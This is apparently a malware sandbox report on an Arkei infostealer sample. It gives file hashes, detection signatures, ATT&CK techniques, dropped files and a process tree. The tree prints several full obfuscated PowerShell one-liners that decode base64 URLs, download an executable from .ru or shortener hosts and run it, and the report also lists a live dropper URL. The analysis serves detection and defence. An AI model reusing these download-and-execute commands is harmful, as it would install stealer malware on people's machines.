arkei | 05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137

Analysis

max time kernel
149s
max time network
167s
platform
windows7_x64
resource
win7-20220414-en
submitted
27-05-2022 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe
Size

65KB
MD5

eb15e7dcfca71d24302f712f93df60ad
SHA1

48515c1ec1feaf5c6d8cee57144b4c4ef32c8e8d
SHA256

05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137
SHA512

2da3d0b0540ea50e043b83da91044da49822ef0dad416b29195ad221fd236b98a1195253eac61112c2a69dcfe2e00059ca0e6655713d02eaff5989c76f32dda1

Score

10^/10

arkei default stealer suricata upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://nicoslag.ru/asdfg.exe

exe.dropper

http://nicoslag.ru/asdfg.exe

Extracted

Family

arkei

Botnet

Default

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata

Blocklisted process makes network request 6 IoCs

flow	pid	Process
15	316	powershell.exe
16	1004	powershell.exe
17	956	powershell.exe
18	1964	powershell.exe
21	956	powershell.exe
22	1004	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 6 IoCs

pid	Process
1772	gen.exe
2508	zpm.exe
2496	zpm.exe
2592	zpm.exe
2584	zpm.exe
2724	zpm.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000001313a-58.dat	upx
behavioral1/files/0x000700000001313a-57.dat	upx
behavioral1/files/0x000700000001313a-59.dat	upx
behavioral1/files/0x000700000001313a-61.dat	upx
behavioral1/memory/1772-63-0x0000000000400000-0x0000000000418000-memory.dmp	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation	zpm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation	zpm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation	zpm.exe

Loads dropped DLL 4 IoCs

pid	Process
1320	cmd.exe
1320	cmd.exe
1964	powershell.exe
316	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2496 set thread context of 2180	2496	zpm.exe	58
PID 2508 set thread context of 2460	2508	zpm.exe	59
PID 2592 set thread context of 2176	2592	zpm.exe	57

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
1004	powershell.exe
956	powershell.exe
108	powershell.exe
768	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1004	powershell.exe
1004	powershell.exe
956	powershell.exe
956	powershell.exe
768	powershell.exe
768	powershell.exe
2508	zpm.exe
2496	zpm.exe
2508	zpm.exe
2496	zpm.exe
2592	zpm.exe
2592	zpm.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	108	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	2508	zpm.exe
Token: SeDebugPrivilege	2496	zpm.exe
Token: SeDebugPrivilege	2592	zpm.exe
Token: SeDebugPrivilege	2584	zpm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1940 wrote to memory of 1320	1940	05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe	29
PID 1940 wrote to memory of 1320	1940	05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe	29
PID 1940 wrote to memory of 1320	1940	05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe	29
PID 1940 wrote to memory of 1320	1940	05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe	29
PID 1320 wrote to memory of 1772	1320	cmd.exe	30
PID 1320 wrote to memory of 1772	1320	cmd.exe	30
PID 1320 wrote to memory of 1772	1320	cmd.exe	30
PID 1320 wrote to memory of 1772	1320	cmd.exe	30
PID 1772 wrote to memory of 1128	1772	gen.exe	31
PID 1772 wrote to memory of 1128	1772	gen.exe	31
PID 1772 wrote to memory of 1128	1772	gen.exe	31
PID 1772 wrote to memory of 1128	1772	gen.exe	31
PID 1128 wrote to memory of 1324	1128	cmd.exe	33
PID 1128 wrote to memory of 1324	1128	cmd.exe	33
PID 1128 wrote to memory of 1324	1128	cmd.exe	33
PID 1128 wrote to memory of 1324	1128	cmd.exe	33
PID 1128 wrote to memory of 764	1128	cmd.exe	34
PID 1128 wrote to memory of 764	1128	cmd.exe	34
PID 1128 wrote to memory of 764	1128	cmd.exe	34
PID 1128 wrote to memory of 764	1128	cmd.exe	34
PID 1128 wrote to memory of 680	1128	cmd.exe	35
PID 1128 wrote to memory of 680	1128	cmd.exe	35
PID 1128 wrote to memory of 680	1128	cmd.exe	35
PID 1128 wrote to memory of 680	1128	cmd.exe	35
PID 1128 wrote to memory of 1144	1128	cmd.exe	36
PID 1128 wrote to memory of 1144	1128	cmd.exe	36
PID 1128 wrote to memory of 1144	1128	cmd.exe	36
PID 1128 wrote to memory of 1144	1128	cmd.exe	36
PID 1128 wrote to memory of 992	1128	cmd.exe	37
PID 1128 wrote to memory of 992	1128	cmd.exe	37
PID 1128 wrote to memory of 992	1128	cmd.exe	37
PID 1128 wrote to memory of 992	1128	cmd.exe	37
PID 1128 wrote to memory of 976	1128	cmd.exe	38
PID 1128 wrote to memory of 976	1128	cmd.exe	38
PID 1128 wrote to memory of 976	1128	cmd.exe	38
PID 1128 wrote to memory of 976	1128	cmd.exe	38
PID 976 wrote to memory of 1964	976	mshta.exe	39
PID 976 wrote to memory of 1964	976	mshta.exe	39
PID 976 wrote to memory of 1964	976	mshta.exe	39
PID 976 wrote to memory of 1964	976	mshta.exe	39
PID 680 wrote to memory of 956	680	mshta.exe	40
PID 680 wrote to memory of 956	680	mshta.exe	40
PID 680 wrote to memory of 956	680	mshta.exe	40
PID 680 wrote to memory of 956	680	mshta.exe	40
PID 1324 wrote to memory of 316	1324	mshta.exe	43
PID 1324 wrote to memory of 316	1324	mshta.exe	43
PID 1324 wrote to memory of 316	1324	mshta.exe	43
PID 1324 wrote to memory of 316	1324	mshta.exe	43
PID 1144 wrote to memory of 108	1144	mshta.exe	42
PID 1144 wrote to memory of 108	1144	mshta.exe	42
PID 1144 wrote to memory of 108	1144	mshta.exe	42
PID 1144 wrote to memory of 108	1144	mshta.exe	42
PID 764 wrote to memory of 768	764	mshta.exe	45
PID 764 wrote to memory of 768	764	mshta.exe	45
PID 764 wrote to memory of 768	764	mshta.exe	45
PID 764 wrote to memory of 768	764	mshta.exe	45
PID 992 wrote to memory of 1004	992	mshta.exe	49
PID 992 wrote to memory of 1004	992	mshta.exe	49
PID 992 wrote to memory of 1004	992	mshta.exe	49
PID 992 wrote to memory of 1004	992	mshta.exe	49
PID 1964 wrote to memory of 2496	1964	powershell.exe	52
PID 1964 wrote to memory of 2496	1964	powershell.exe	52
PID 1964 wrote to memory of 2496	1964	powershell.exe	52
PID 1964 wrote to memory of 2496	1964	powershell.exe	52

C:\Users\Admin\AppData\Local\Temp\05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe
"C:\Users\Admin\AppData\Local\Temp\05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\1D80.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\05c1db899e9fa8d5680ae0d7b235b1d9f0c8d70622dacca16dab257a18662137.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1320
- - C:\Users\Admin\AppData\Local\Temp\gen.exe
    gen.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1772
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\gen.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1128
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\b1.hta"
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:1324
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ufnxmjsqb $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ufnxmjsqb mwsfev $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|mwsfev;ufnxmjsqb zwncmhjoglapft $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0TQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);zwncmhjoglapft $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:316
        
        C:\Users\Public\zpm.exe
        
        "C:\Users\Public\zpm.exe"
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2508
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        8⤵
        
        PID:2460
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\b1a.hta"
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:764
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xksqtuiezpom $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xksqtuiezpom najxgsmhtuwd $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|najxgsmhtuwd;xksqtuiezpom lubwzta $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);lubwzta $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:768
        
        C:\Users\Public\zpm.exe
        
        "C:\Users\Public\zpm.exe"
        7⤵
        Executes dropped EXE
        
        PID:2724
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\b2.hta"
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:680
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL luhqmxbnvrt $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;luhqmxbnvrt pkzotxjl $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzotxjl;luhqmxbnvrt aiykpt $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs1aQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);aiykpt $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:956
        
        C:\Users\Public\zpm.exe
        
        "C:\Users\Public\zpm.exe"
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2592
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        8⤵
        
        PID:2176
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\b2a.hta"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1144
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL qjezygpm $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;qjezygpm tykqrhcaxivo $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tykqrhcaxivo;qjezygpm yqvjfrouc $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);yqvjfrouc $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:108
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\m1.hta"
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:992
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwygvqhixbak $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwygvqhixbak rwfxnse $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rwfxnse;fwygvqhixbak vdgyxptwz $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0Yg==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);vdgyxptwz $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1004
        
        C:\Users\Public\zpm.exe
        
        "C:\Users\Public\zpm.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2584
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\m1a.hta"
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:976
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xrfhvszbucp $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xrfhvszbucp qtpbfnvsjwme $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|qtpbfnvsjwme;xrfhvszbucp pedzf $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);pedzf $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1964
        
        C:\Users\Public\zpm.exe
        
        "C:\Users\Public\zpm.exe"
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2496
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        8⤵
        
        PID:2180

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1D80.tmp\start.bat

Filesize
60B

MD5
210943872932de11fcdf7ea3723bc5c6

SHA1
1441e366faf476759ee83c868ed8c3fa6dddef49

SHA256
8e02b4a77db3465df283dca7afcbe9bcf1776763b63fd3dab5fd7e98316225e2

SHA512
9bb03b0d67b5f2e36c1560d136d21157b2b32c205349af4851a632c2924d2daed96ca70ddbe68cab47b18dc611b78da8902c34c6844c3b99bec7693a49db73d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\b1.hta

Filesize
4KB

MD5
e66d251ec771c96871b379e9190ff7a1

SHA1
37f14cd2f77b3f1877e266dc1f7e8df882119912

SHA256
2778e5c8e94981206b305108d42ac9c9d7be5f36eaf94cab2483120e9d3d3696

SHA512
4a8c886a828f61b031e9169886711da85d411535e2b6b1062614cd3fee4947fe340a60125dd0f30523a359ca677debbeba15ed55497e2bbe24787dfa5309ce88

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\b1a.hta

Filesize
4KB

MD5
5fc9f573414f4bdf535974dcc5812b87

SHA1
028b64ccbb98e650ee4909de019b0ff2da4cd138

SHA256
3b282cd60bc0c9689b4a68d2013f986e3534190042c8359be580db7004803118

SHA512
dfaaa82faa1ea65ed4da21bcebf7ca9821feef63b6ebb6b5d9ad40dd839520e2dffd4ed90fa10e2dbe670f377e6ad5bd59f4fcf115e29e693493325558ce253c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\b2.hta

Filesize
4KB

MD5
68950206a64bdad979c35f5e4a67e8be

SHA1
d2789c3e940275ba2c30a6b5eb8c91da5751f1f9

SHA256
4864a18f70757f92fcf8631c918687e528768165dff70b8f5ebacd29a256e6bf

SHA512
8ca1391b917ff14b3c3b4f3145d9248b0ca154033646b9efbf3121d1a150ccfe5fad005a20f61b19ca95486e9d00caef9c12b98f5dba65a3a9ed84a6394c1d57

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\b2a.hta

Filesize
4KB

MD5
aad742136ab66a8cedceeb0d5175c249

SHA1
98103efcf3c76f5b5ba4ad208702ac49e8da1f4f

SHA256
63f208e5dc8a4bf02bb5ed4e65a8e187bfbbe43856d6546fdb49efa555b46af6

SHA512
23e0c5c6bb379610fe37ef64f5b3e49152c6d221229a6f4dc448d6076506f9c4b72e36691fa12d761c6fc32d96cba810e6ad6406d8ef6f29bd294cb951867093

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\m1.hta

Filesize
4KB

MD5
a75bddf46ecdadb3cbf1ff26a9c52c9e

SHA1
1c58d74bba1df1293494e248abd35d38153696df

SHA256
fc97cfcd0a76d1e8fbffb3c2ae137bdd08f5e05114c20c8049cc52d08421b287

SHA512
054464f5a10a4694ccfe3ec760e38afee83873d8b1d40b58bd1193a0f609ae57c0e7725c5a139dbdd61e8cd5b69f9ad1d1448aee03c594ee7d948a0fc8b4b5e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\m1a.hta

Filesize
4KB

MD5
f4db89dbe45cd8e7fb12009af13a9608

SHA1
b8682e5b10d93b32e01858355e50fd2c7daafde3

SHA256
48a17e20a2f884bf3d97e30a43bc7af1141832f28fc4feeb33ade73e4c9487aa

SHA512
b5df1b079ad5fda423a0bdd62bf2c0fb3c825ec3a237f36eef40bc4a572cf30bef2b434d448c93c52bfc1cbed3b1bc9b93b10ffe124f7cbd3f66f5aaa894b182

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E0D.tmp\start2.bat

Filesize
132B

MD5
b775a1ac4fb96d9d35bbded9ea742f0c

SHA1
99b0c8d6cb5769f6aa2d292d4d9471d35ce66881

SHA256
d6956455e62011b28826a709db4e65a7b3595023512349d2681f22a07e6f1ce8

SHA512
85486d7b50a3ba35713b6f134286c2af35033ca392ef2b47d88516aafca6ea8cd245ce6be67e5c728fd539ed7da5c9a3291ed7b0b39cb5259939e84fb6a4052c

Download Submit
C:\Users\Admin\AppData\Local\Temp\gen.exe

Filesize
24KB

MD5
76ea003513a4fcde2517a83f607f1624

SHA1
a1ffde782b420741de47e4b744d6eb40dd562e69

SHA256
